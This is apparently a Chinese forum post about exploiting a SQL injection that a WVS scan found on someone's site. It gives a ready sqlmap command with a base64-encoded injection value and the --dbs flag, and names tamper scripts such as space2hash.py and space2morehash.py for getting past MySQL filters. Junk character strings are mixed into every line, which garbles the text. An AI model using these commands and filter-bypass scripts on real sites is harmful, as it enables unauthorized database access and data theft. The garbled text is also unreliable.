WVS扫某站就出来一个SQL Injection,参数还是base64编码的,手工注入麻烦一步,用sqlmap怎么自动注射呢?, F% f* Z S/ f* H, p
* U2 o! C6 N \3 j7 X2 T4 c. S6 \sqlmap的tamper里有个base64encode.py
/ _! H1 u1 ^1 U; p: ~/ O
! l: |1 h: x- Y# t! C使用如下- u7 M$ ^9 v2 }7 H
V( {, b$ Q+ C8 H- \& u( ^
sqlmap -u http://ha.cker.in/index.php?tel=LTEnIG9yICc4OCc9Jzg5 --tamper base64encode.py –dbs# ~* Y( m0 {7 q; j
) f% x% T7 K" [* F, C* ~4 R
, ~" A C/ j: B z% qsqlmap拥有很多功能强力的插件,插件的使用方法: -- tamper “插件名称”& Y1 I4 G& h. T s# b2 W0 T
6 j7 H/ @( Y' k3 Z) T' F
其中常用到的bypass脚本绕过SQLMAP主要两个脚本:
7 r- t' w1 m% L8 H! Q X5 e9 [; d" y% {$ }
space2hash.py ,对于MYSQL数据库 4.0, 5.0注入' p4 ~+ n# W. G9 M
space2morehash.py ,对于MYSQL数据库 >= 5.1.13 和 MySQL 5.1.41 注入7 q& T: s. B9 Q3 D# X+ v" _5 [2 l! F
首先确定目标数据库版本,然后选择相应的脚本。$ @2 S* n6 F- _, W2 {/ [$ R W, e5 Y
-v 3 --batch --tamper "space2hash.py"
& g. o! R$ T# \; b+ W
( N0 V: Q5 N* ? f/ n) a还有其他一些插件:
5 O6 _0 M1 F4 |- F8 j+ L$ X- T+ ^encodes编码 ——charencode.py: c. |) a. j# D7 ^) p. [) c2 _
base64编码 —— base64encode.py2 U, j, Q4 Q8 R, y
替换空格和关键字 —— halfversionedmorekeywords.py
u4 E6 G U( l ~9 w | 4 d' D2 ?6 X6 Q
$ q" o4 U: e! m ] J
' [$ O8 J/ L2 S) S' W1 c5 h: e3 o: ^* W. ~3 u% y7 R2 J
|